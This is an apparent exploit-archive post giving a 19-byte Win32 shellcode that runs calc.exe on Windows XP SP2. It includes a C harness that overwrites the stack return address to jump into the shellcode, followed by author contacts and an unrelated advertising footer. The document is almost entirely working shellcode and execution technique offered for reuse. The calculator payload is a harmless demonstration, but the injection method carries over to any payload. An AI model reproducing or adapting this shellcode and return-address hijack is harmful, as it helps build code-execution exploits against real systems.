/ Win32 Shellcode Collection (calc) 19 bytes
// Shellcode Exec Calc.exe
// Tested on XP SP2 FR
// Author : SkuLL-HacKeR
// H0ME  : Geeksec.com  & S3curity-art.com
//  Email : My@Hotmail.iT<mailto:My@Hotmail.iT> & Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com>

#include "stdio.h"
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

________________________________
Doretta Doretta ti "cerca"! Vieni a trovarla sul suo Spaces!<http://doretta82live.spaces.live.com/>